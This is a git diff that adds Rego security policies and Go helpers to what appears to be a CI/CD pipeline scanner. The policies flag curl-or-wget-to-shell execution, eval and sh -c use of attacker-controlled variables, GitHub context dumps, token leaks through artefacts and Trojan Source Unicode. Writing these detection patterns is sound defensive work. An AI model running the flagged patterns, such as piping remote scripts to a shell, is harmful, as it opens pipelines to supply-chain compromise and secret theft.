+_job_unredacts_secrets(job) if {
+ some k
+ regex.match(unredacted_pattern, job.scripts[k])
+}
+
+_job_unredacts_secrets(job) if {
+ some _, value in job.variables
+ regex.match(unredacted_pattern, value)
+}
+
+_job_unredacts_secrets(job) if {
+ some k
+ action := job.uses[k]
+ some _, value in action.with
+ is_string(value)
+ regex.match(unredacted_pattern, value)
+}
diff --git a/policies/unsafe_github_context_dump.rego b/policies/unsafe_github_context_dump.rego
new file mode 100644
index 0000000..301c550
--- /dev/null
+++ b/policies/unsafe_github_context_dump.rego
@@ -0,0 +1,50 @@
+# unsafe-github-context-dump β flag workflows that serialise the
+# whole `github` context (or `github.event`) with `toJson(...)` and
+# hand it to a script, env binding, or action input. The resulting
+# JSON carries every user-controllable field GitHub exposes; any
+# downstream consumer (log, third-party action, HTTP header) then
+# sees a payload that is trivially shell-injectable under privileged
+# triggers (`pull_request_target`, `workflow_run`).
+#
+# Mirror of ISSUE-301 (overprovisioned-secrets) applied to the
+# github context. Severity is high rather than critical: the
+# github context does not carry long-lived tokens like `secrets`
+# does, but it can still be weaponised into shell injection.
+package unsafe_github_context_dump
+
+import rego.v1
+
+# Matches toJson(github), toJson(github.event), and whitespace-
+# permissive variants. Case-insensitive because GitHub accepts both
+# `toJson` and `toJSON`.
+context_dump_pattern := `(?i)to\s*json\s*\(\s*github(\.event)?\s*\)`
+
+deny contains finding if {
+ some i
+ job := input.pipeline.jobs[i]
+ _job_dumps_github(job)
+ finding := {
+ "code": "ISSUE-213",
+ "severity": "high",
+ "message": sprintf("job %q serialises the entire `github` context via toJson(github) β pass specific fields by name instead", [job.name]),
+ "job": job.name,
+ }
+}
+
+_job_dumps_github(job) if {
+ some k
+ regex.match(context_dump_pattern, job.scripts[k])
+}
+
+_job_dumps_github(job) if {
+ some _, value in job.variables
+ regex.match(context_dump_pattern, value)
+}
+
+_job_dumps_github(job) if {
+ some k
+ action := job.uses[k]
+ some _, value in action.with
+ is_string(value)
+ regex.match(context_dump_pattern, value)
+}
diff --git a/policies/unsafe_variable_expansion.rego b/policies/unsafe_variable_expansion.rego
new file mode 100644
index 0000000..00088e0
--- /dev/null
+++ b/policies/unsafe_variable_expansion.rego
@@ -0,0 +1,92 @@
+# unsafe-variable-expansion β flag pipeline scripts that pipe or
+# re-parse an attacker-controlled CI variable through a shell. The
+# classic sinks are `eval`, `sh -c`, `bash -c`, `dash/zsh/ksh -c`,
+# `envsubst|xargs` chains, and shell sourcing (`source` /
+# `. file`). When the variable carried into those sinks is one of the
+# user-influenceable CI variables (CI_COMMIT_MESSAGE,
+# CI_COMMIT_BRANCH, etc.), an attacker pushing a crafted commit or
+# branch name can execute arbitrary shell code.
+#
+# Parity with the legacy Go control:
+# - The pattern list mirrors controlGitlabPipelineVariableInjection.go
+# verbatim (eval, *sh -c, envsubst|sh, xargs sh|bash, source, dot
+# sourcing).
+# - Empty/comment lines are skipped before re-parse detection.
+# - Variable detection enforces a word boundary on the unbraced
+# `$VAR` form, mirroring the legacy regex
+# `\$(?:\{VAR\}|VAR(?:[^a-zA-Z0-9_]|$))`. So `$CI_COMMIT_MESSAGE`
+# matches but `$CI_COMMIT_MESSAGE_OTHER` does not.
+#
+# Config:
+# input.config.unsafeVariableExpansion.dangerousVariables = ["CI_COMMIT_MESSAGE", β¦]
+# input.config.unsafeVariableExpansion.allowedPatterns = ["safe pattern", β¦]
+package unsafe_variable_expansion
+
+import rego.v1
+
+shell_reparse_patterns := [
+ `\beval\b`,
+ `\b(sh|bash|dash|zsh|ksh)\s+-c\b`,
+ `\benvsubst\b.*\|\s*(sh|bash|dash|zsh)`,
+ `\bxargs\s+(sh|bash)\b`,
+ `\bsource\b`,
+ `^\s*\.(\s|$)`,
+]
+
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ line := job.scripts[j]
+ trimmed := trim_space(line)
+ trimmed != ""
+ not startswith(trimmed, "#")
+ _has_shell_reparse(trimmed)
+ var_name := _dangerous_variable_in_line(line)
+ not _is_allowed(line)
+ block := _script_block(job, j)
+ finding := {
+ "code": "ISSUE-204",
+ "severity": "high",
+ "message": sprintf("$%s in job '%s' %s: %s", [var_name, job.name, block, trimmed]),
+ "job": job.name,
+ "variableName": var_name,
+ "scriptLine": trimmed,
+ "scriptBlock": block,
+ }
+}
+
+# _script_block returns the block label ("before_script", "script",
+# "after_script") for the script line at index `j`. Falls back to
+# "script" when the collector did not populate ScriptBlocks (older
+# fixtures, non-GitLab providers).
+_script_block(job, j) := block if {
+ block := job.scriptBlocks[j]
+ block != ""
+} else := "script"
+
+_has_shell_reparse(line) if {
+ regex.match(shell_reparse_patterns[_], line)
+}
+
+_dangerous_variable_in_line(line) := name if {
+ some candidate in input.config.unsafeVariableExpansion.dangerousVariables
+ _variable_used(line, candidate)
+ name := candidate
+}
+
+# Match ${VAR} (braced β exact name).
+_variable_used(line, name) if {
+ regex.match(sprintf(`\$\{%s\}`, [name]), line)
+}
+
+# Match $VAR followed by a non-word boundary or end-of-line. Mirrors
+# the legacy `\$VAR(?:[^a-zA-Z0-9_]|$)` form so `$CI_COMMIT_MESSAGE`
+# is flagged but `$CI_COMMIT_MESSAGE_OTHER` is not.
+_variable_used(line, name) if {
+ regex.match(sprintf(`\$%s($|[^a-zA-Z0-9_])`, [name]), line)
+}
+
+_is_allowed(line) if {
+ pattern := input.config.unsafeVariableExpansion.allowedPatterns[_]
+ regex.match(pattern, line)
+}
diff --git a/policies/unsound_condition.rego b/policies/unsound_condition.rego
new file mode 100644
index 0000000..5d19335
--- /dev/null
+++ b/policies/unsound_condition.rego
@@ -0,0 +1,52 @@
+# unsound-condition β flag `if:` expressions that are logically
+# unsound: tautologies (`always()` short-circuiting an OR),
+# contradictions (`false && ...`), and bare boolean conditions that
+# never evaluate to the expected value because GitHub parses them as
+# string literals when the author forgot the `${{ }}` wrapping.
+#
+# These are subtle bugs: the gate the author believes they have
+# installed is not actually there, and the step / job runs (or never
+# runs) silently. The policy is per-condition, reusing the IR's
+# Conditions slice (job + step-level `if:` collected by the
+# collector).
+package unsound_condition
+
+import rego.v1
+
+tautology_patterns := [
+ `\balways\(\)\s*\|\|`,
+ `\|\|\s*always\(\)`,
+ `\btrue\s*==\s*true\b`,
+ `\b1\s*==\s*1\b`,
+ `\b'[^']*'\s*==\s*'[^']*'\s*\|\|\s*true\b`,
+]
+
+contradiction_patterns := [
+ `\bfalse\s*&&`,
+ `&&\s*false\b`,
+ `\btrue\s*==\s*false\b`,
+ `\bfalse\s*==\s*true\b`,
+]
+
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ cond := job.conditions[j]
+ reason := _unsound_reason(cond)
+ finding := {
+ "code": "ISSUE-211",
+ "severity": "medium",
+ "message": sprintf("job %q has an unsound `if:` condition (%s): %q", [job.name, reason, cond]),
+ "job": job.name,
+ }
+}
+
+_unsound_reason(cond) := "tautology" if {
+ some p in tautology_patterns
+ regex.match(p, cond)
+}
+
+_unsound_reason(cond) := "contradiction" if {
+ some p in contradiction_patterns
+ regex.match(p, cond)
+}
diff --git a/policies/unsound_contains.rego b/policies/unsound_contains.rego
new file mode 100644
index 0000000..328b6d3
--- /dev/null
+++ b/policies/unsound_contains.rego
@@ -0,0 +1,51 @@
+# unsound-contains β flag `contains(haystack, needle)` calls whose
+# argument order makes the check always fail. The most frequent
+# footgun is `contains('main', github.ref)`: the literal `'main'`
+# does not contain `refs/heads/main`, so the gate never matches on
+# the `main` branch β but the author intended the opposite.
+#
+# Detection heuristic: `contains('β¦literalβ¦', β¦expressionβ¦)` β a
+# string literal as the HAYSTACK with an expression as the NEEDLE is
+# almost always the inverted form. The safe form is
+# `contains(github.ref, 'refs/heads/main')` or
+# `contains(fromJSON('[β¦]'), github.ref_name)` (explicit set).
+package unsound_contains
+
+import rego.v1
+
+# First argument is a string literal (single quotes, no template
+# expressions inside), second argument references a template
+# expression (`github.`, `inputs.`, `needs.`, `env.`, `vars.`,
+# `steps.`, `secrets.`, `matrix.`, `runner.`). The fromJSON(...)
+# haystack form β a valid JSON list as the first argument β is the
+# safe idiom, so we exclude `fromJSON(` from the literal match.
+suspicious_pattern := `\bcontains\s*\(\s*'[^']{1,40}'\s*,\s*(github\.|inputs\.|needs\.|env\.|vars\.|steps\.|secrets\.|matrix\.|runner\.)`
+
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ cond := job.conditions[j]
+ regex.match(suspicious_pattern, cond)
+ finding := {
+ "code": "ISSUE-212",
+ "severity": "medium",
+ "message": sprintf("job %q calls `contains()` with a literal haystack and an expression needle β arguments likely inverted in %q", [job.name, cond]),
+ "job": job.name,
+ }
+}
+
+# Scripts can also build `contains(...)` calls inside ${{ }} blocks
+# that feed env bindings or output assignments. Same check applied
+# to the scripts slice.
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ script := job.scripts[j]
+ regex.match(suspicious_pattern, script)
+ finding := {
+ "code": "ISSUE-212",
+ "severity": "medium",
+ "message": sprintf("job %q has a script with an inverted `contains(literal, expression)` call", [job.name]),
+ "job": job.name,
+ }
+}
diff --git a/policies/unverified_scripts.rego b/policies/unverified_scripts.rego
new file mode 100644
index 0000000..3258940
--- /dev/null
+++ b/policies/unverified_scripts.rego
@@ -0,0 +1,47 @@
+# unverified-scripts β flag pipeline scripts that download and execute
+# remote code without integrity verification. The classic offender is
+# the `curl ... | bash` pattern, a well-known supply-chain attack
+# vector: a single compromise of the upstream URL turns the pipeline
+# into an attacker-controlled payload.
+#
+# The policy currently matches the "pipe-to-shell" shape. Other unsafe
+# patterns (download-and-exec, download-redirect-exec) can be added
+# incrementally.
+#
+# Lines that include a checksum / signature verification command on
+# the same line (sha256sum, shasum, gpg --verify, cosign verify, β¦)
+# are treated as intentionally verified and skipped.
+package unverified_scripts
+
+import rego.v1
+
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ line := job.scripts[j]
+ regex.match(`(?i)(curl|wget)\s+[^|]*\|\s*(sudo\s+)?(bash|sh|zsh|python[23]?|perl|ruby)\b`, line)
+ not _line_is_verified(line)
+ not _line_is_trusted(line)
+ finding := {
+ "code": "ISSUE-411",
+ "severity": "high",
+ "message": sprintf("Job '%s' script: %s", [job.name, trim_space(line)]),
+ "job": job.name,
+ "scriptLine": line,
+ }
+}
+
+_line_is_verified(line) if {
+ regex.match(`(?i)(sha256sum|sha512sum|sha1sum|shasum|gpg\s+--verify|cosign\s+verify)`, line)
+}
+
+# A line is trusted when it references at least one URL whose host
+# (and optional path prefix) matches a user-configured glob in
+# pipelineMustNotExecuteUnverifiedScripts.trustedUrls. Mirrors the
+# legacy isTrusted helper: extract every http(s) URL on the line and
+# allow the line as soon as any of them matches a trusted pattern.
+_line_is_trusted(line) if {
+ some pattern in input.config.unverifiedScripts.trustedUrls
+ url := regex.find_n(`https?://[^\s|;)'"]+`, line, -1)[_]
+ glob.match(pattern, null, url)
+}
diff --git a/policies/use_trusted_publishing.rego b/policies/use_trusted_publishing.rego
new file mode 100644
index 0000000..2520711
--- /dev/null
+++ b/policies/use_trusted_publishing.rego
@@ -0,0 +1,66 @@
+# use-trusted-publishing β flag PyPI / npm / Maven-Central publish
+# steps that rely on a long-lived static token instead of OIDC
+# trusted publishing. The explicit signal is a `password:` /
+# `NODE_AUTH_TOKEN` / equivalent `with:` / `env:` input that points
+# at a secrets.* value, paired with a known publish action.
+#
+# OIDC trusted publishing removes the standing secret: tokens are
+# short-lived, scoped to a repository / workflow / environment, and
+# minted only for the run that claims them. Projects migrating away
+# from static tokens drop the `password:` input entirely.
+package use_trusted_publishing
+
+import rego.v1
+
+# Publish actions we know about. The policy does not cover every
+# obscure community action β Dependabot's own publish pipeline, for
+# instance β but the big three ecosystems are here.
+publish_actions := {
+ "pypa/gh-action-pypi-publish": "PyPI",
+ "JS-DevTools/npm-publish": "npm",
+ "gradle/gradle-build-action": "Gradle",
+ "gradle/actions/publish": "Gradle",
+ "sonatype/central-publishing-gradle-plugin": "Maven Central",
+}
+
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ action := job.uses[j]
+ ecosystem := _publish_action_ecosystem(action.uses)
+ _step_uses_static_token(action)
+ finding := {
+ "code": "ISSUE-605",
+ "severity": "high",
+ "message": sprintf("job %q publishes to %s via %q with a static token β migrate to OIDC trusted publishing", [job.name, ecosystem, action.uses]),
+ "job": job.name,
+ "line": object.get(action, "line", 0),
+ }
+}
+
+_publish_action_ecosystem(uses) := eco if {
+ some prefix, ecosystem in publish_actions
+ startswith(uses, sprintf("%s@", [prefix]))
+ eco := ecosystem
+}
+
+_publish_action_ecosystem(uses) := eco if {
+ some prefix, ecosystem in publish_actions
+ uses == prefix
+ eco := ecosystem
+}
+
+_step_uses_static_token(action) if {
+ # pypa/gh-action-pypi-publish keys its token on `password`.
+ # When OIDC is used, the input is simply omitted.
+ pw := action.with.password
+ is_string(pw)
+ regex.match(`\$\{\{\s*secrets\.`, pw)
+}
+
+_step_uses_static_token(action) if {
+ # JS-DevTools/npm-publish: `token` input holds the static token.
+ tok := action.with.token
+ is_string(tok)
+ regex.match(`\$\{\{\s*secrets\.`, tok)
+}
diff --git a/policies/workflow_misfeature.rego b/policies/workflow_misfeature.rego
new file mode 100644
index 0000000..56fca98
--- /dev/null
+++ b/policies/workflow_misfeature.rego
@@ -0,0 +1,44 @@
+# workflow-misfeature β flag two supported-but-harmful patterns:
+#
+# 1. `actions/upload-artifact` with `path: .` (or the checkout
+# directory) uploads the entire repository, including `.git/`.
+# Paired with artipacked (ISSUE-307) this exfiltrates the
+# GITHUB_TOKEN to anyone who can download the artefact.
+# 2. `actions/upload-artifact` with `path: ${{ github.workspace }}`
+# β same thing, just dressed up as an expression.
+#
+# Other misfeature patterns from the catalog β `shell: cmd`, inline
+# pip install with a remote URL β are either covered by ISSUE-411
+# (unverified scripts) or require step-level shell tracking the IR
+# does not carry yet.
+package workflow_misfeature
+
+import rego.v1
+
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ action := job.uses[j]
+ startswith(action.uses, "actions/upload-artifact@")
+ path := action.with.path
+ is_string(path)
+ _uploads_checkout_dir(path)
+ finding := {
+ "code": "ISSUE-603",
+ "severity": "medium",
+ "message": sprintf("job %q uploads the checkout directory as an artefact (path=%q) β `.git/` leaks with it, pair with ISSUE-307 to understand the risk", [job.name, path]),
+ "job": job.name,
+ }
+}
+
+_uploads_checkout_dir(path) if {
+ path == "."
+}
+
+_uploads_checkout_dir(path) if {
+ path == "./"
+}
+
+_uploads_checkout_dir(path) if {
+ regex.match(`\$\{\{\s*github\.workspace\s*\}\}\s*/?$`, path)
+}
diff --git a/policies/workflow_obfuscation.rego b/policies/workflow_obfuscation.rego
new file mode 100644
index 0000000..c69fe1f
--- /dev/null
+++ b/policies/workflow_obfuscation.rego
@@ -0,0 +1,49 @@
+# workflow-obfuscation β flag workflows whose scripts or expression
+# fragments carry invisible or bidirectional Unicode characters. The
+# rendered source reads harmless in a diff review, while the runner
+# executes a different instruction. Two classes are covered:
+#
+# - Zero-width spaces / joiners / non-joiners (U+200BβU+200F,
+# U+FEFF) β used to hide tokens inside an identifier or a URL.
+# - Bidirectional overrides (U+202AβU+202E, U+2066βU+2069) β the
+# Trojan Source attack class (CVE-2021-42574) exploited in the
+# wild since 2021 against npm / PyPI packages.
+#
+# The scan runs on every script line, every env binding value, and
+# every action `with:` input. Normal ASCII, latin-1, and whitespace
+# pass through untouched.
+package workflow_obfuscation
+
+import rego.v1
+
+invisible_pattern := `[\x{200B}-\x{200F}\x{202A}-\x{202E}\x{2066}-\x{2069}\x{FEFF}]`
+
+deny contains finding if {
+ some i
+ job := input.pipeline.jobs[i]
+ _job_contains_obfuscation(job)
+ finding := {
+ "code": "ISSUE-604",
+ "severity": "high",
+ "message": sprintf("job %q contains zero-width or bidirectional Unicode in its scripts / env / action inputs β Trojan Source / invisible-character attack pattern", [job.name]),
+ "job": job.name,
+ }
+}
+
+_job_contains_obfuscation(job) if {
+ some k
+ regex.match(invisible_pattern, job.scripts[k])
+}
+
+_job_contains_obfuscation(job) if {
+ some _, value in job.variables
+ regex.match(invisible_pattern, value)
+}
+
+_job_contains_obfuscation(job) if {
+ some k
+ action := job.uses[k]
+ some _, value in action.with
+ is_string(value)
+ regex.match(invisible_pattern, value)
+}
diff --git a/utils/gitremote.go b/utils/gitremote.go
index 872d3b0..e0fdc10 100644
--- a/utils/gitremote.go
+++ b/utils/gitremote.go
@@ -7,12 +7,26 @@ import (
"strings"
)
-// GitRemoteInfo contains parsed information from a git remote URL
+// GitRemoteInfo contains parsed information from a git remote URL.
type GitRemoteInfo struct {
- Host string // e.g., "gitlab.com" or "gitlab.example.com"
+ Host string // e.g., "gitlab.com", "github.com", "gitlab.example.com"
ProjectPath string // e.g., "group/project" or "group/subgroup/project"
- URL string // The full GitLab URL, e.g., "https://gitlab.com"
+ URL string // The full instance URL, e.g., "https://gitlab.com"
RepoRoot string // Absolute path to the git repository root
+ Provider string // "gitlab" or "github" β derived from Host; default "gitlab" for unknown hosts (self-hosted GitLab is the common case).
+}
+
+// detectProviderFromHost maps a git remote host name to the provider name
+// expected by the rest of Plumber. GitHub is identified exactly;
+// everything else (including self-hosted and gitlab.com) maps to GitLab
+// since that is what Plumber has historically supported.
+func detectProviderFromHost(host string) string {
+ switch strings.ToLower(host) {
+ case "github.com":
+ return "github"
+ default:
+ return "gitlab"
+ }
}
// DetectGitRemote attempts to detect GitLab URL and project path from git remote.
@@ -63,53 +77,38 @@ func DetectGitRepoRoot() string {
// Returns nil if the URL cannot be parsed.
func ParseGitRemoteURL(remoteURL string) *GitRemoteInfo {
// Try SSH URL format: ssh://[user@]host[:port]/path.git
- // The port is intentionally ignored as the GitLab API uses HTTPS
+ // The port is intentionally ignored as the platform API uses HTTPS.
sshURLRegex := regexp.MustCompile(`^ssh://[^@]+@([^/:]+)(?::\d+)?/(.+?)(?:\.git)?$`)
if matches := sshURLRegex.FindStringSubmatch(remoteURL); matches != nil {
- host := matches[1]
- projectPath := matches[2]
- return &GitRemoteInfo{
- Host: host,
- ProjectPath: projectPath,
- URL: fmt.Sprintf("https://%s", host),
- }
+ return newGitRemoteInfo(matches[1], matches[2])
}
// Try SSH SCP-like format: git@host:path.git
sshRegex := regexp.MustCompile(`^git@([^:]+):(.+?)(?:\.git)?$`)
if matches := sshRegex.FindStringSubmatch(remoteURL); matches != nil {
- host := matches[1]
- projectPath := matches[2]
- return &GitRemoteInfo{
- Host: host,
- ProjectPath: projectPath,
- URL: fmt.Sprintf("https://%s", host),
- }
+ return newGitRemoteInfo(matches[1], matches[2])
}
// Try HTTPS format: https://host[:port]/path.git
httpsRegex := regexp.MustCompile(`^https?://([^/]+)/(.+?)(?:\.git)?$`)
if matches := httpsRegex.FindStringSubmatch(remoteURL); matches != nil {
- host := matches[1]
- projectPath := matches[2]
- return &GitRemoteInfo{
- Host: host,
- ProjectPath: projectPath,
- URL: fmt.Sprintf("https://%s", host),
- }
+ return newGitRemoteInfo(matches[1], matches[2])
}
// Try Git protocol format: git://host[:port]/path.git
gitRegex := regexp.MustCompile(`^git://([^/:]+)(?::\d+)?/(.+?)(?:\.git)?$`)
if matches := gitRegex.FindStringSubmatch(remoteURL); matches != nil {
- host := matches[1]
- projectPath := matches[2]
- return &GitRemoteInfo{
- Host: host,
- ProjectPath: projectPath,
- URL: fmt.Sprintf("https://%s", host),
- }
+ return newGitRemoteInfo(matches[1], matches[2])
}
return nil
}
+
+func newGitRemoteInfo(host, projectPath string) *GitRemoteInfo {
+ return &GitRemoteInfo{
+ Host: host,
+ ProjectPath: projectPath,
+ URL: fmt.Sprintf("https://%s", host),
+ Provider: detectProviderFromHost(host),
+ }
+}
diff --git a/utils/pipeline.go b/utils/pipeline.go
index 4630e19..f42acc5 100644
--- a/utils/pipeline.go
+++ b/utils/pipeline.go
@@ -1,6 +1,26 @@
package utils
-import "strings"
+import (
+ "regexp"
+ "strings"
+)
+
+// digestPinRegex matches an OCI image digest pin: `@:`.
+// Algorithm is lowercase alphanumeric (sha256, sha512, ...) per the
+// OCI image spec. Using a regex instead of `strings.Contains(@sha256:)`
+// avoids false negatives on sha512 / future digest algorithms.
+var digestPinRegex = regexp.MustCompile(`@[a-z0-9]+:[a-fA-F0-9]+`)
+
+// HasDigestPin reports whether ref contains a digest reference using
+// any algorithm allowed by the OCI image spec β sha256 today, sha512
+// already in production at some registries, and any future algorithm
+// without a code change. Empty refs return false.
+func HasDigestPin(ref string) bool {
+ if ref == "" {
+ return false
+ }
+ return digestPinRegex.MatchString(ref)
+}
// OverriddenJobDetail captures which job was overridden and with which forbidden CI/CD keywords.
// Shared across control (detection) and pbom (reporting) packages.